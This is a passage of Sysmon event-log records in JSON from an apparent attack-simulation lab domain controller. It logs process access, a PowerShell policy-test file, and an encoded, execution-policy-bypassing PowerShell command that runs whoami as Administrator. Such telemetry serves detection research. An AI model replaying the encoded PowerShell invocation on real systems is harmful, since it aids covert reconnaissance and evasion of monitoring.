{41C8662E-1F8C-5F25-0000-0010A6800400}\r\nTargetProcessId: 4492\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.282","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F8C-5F25-0000-0010A6800400}","TargetProcessId":"4492","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2570,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.282\r\nProcessGuid: {41C8662E-1F8C-5F25-0000-0010A6800400}\r\nProcessId: 4492\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_11amvtvt.ccb.ps1\r\nCreationUtcTime: 2020-08-01 07:53:48.282","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.282","ProcessGuid":"{41C8662E-1F8C-5F25-0000-0010A6800400}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_11amvtvt.ccb.ps1","CreationUtcTime":"2020-08-01 07:53:48.282","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2571,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.329\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F8C-5F25-0000-0010A6800400}\r\nTargetProcessId: 4492\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.329","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F8C-5F25-0000-0010A6800400}","TargetProcessId":"4492","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2572,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.329\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F8C-5F25-0000-0010A6800400}\r\nTargetProcessId: 4492\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.329","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F8C-5F25-0000-0010A6800400}","TargetProcessId":"4492","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2573,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.394\r\nProcessGuid: {41C8662E-1F8C-5F25-0000-0010B28C0400}\r\nProcessId: 4608\r\nImage: C:\\Windows\\System32\\whoami.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: whoami - displays logged on user information\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: whoami.exe\r\nCommandLine: \"C:\\Windows\\system32\\whoami.exe\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-1F8C-5F25-0000-0020B17C0400}\r\nLogonId: 0x47CB1\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9\r\nParentProcessGuid: {41C8662E-1F8C-5F25-0000-0010A6800400}\r\nParentProcessId: 4492\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.394","ProcessGuid":"{41C8662E-1F8C-5F25-0000-0010B28C0400}","Image":"C:\\Windows\\System32\\whoami.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"whoami - displays logged on user information","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"whoami.exe","CommandLine":"\"C:\\Windows\\system32\\whoami.exe\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-1F8C-5F25-0000-0020B17C0400}","LogonId":"0x47cb1","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9","ParentProcessGuid":"{41C8662E-1F8C-5F25-0000-0010A6800400}","ParentProcessId":"4492","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2574,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2575,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2576,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2577,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.d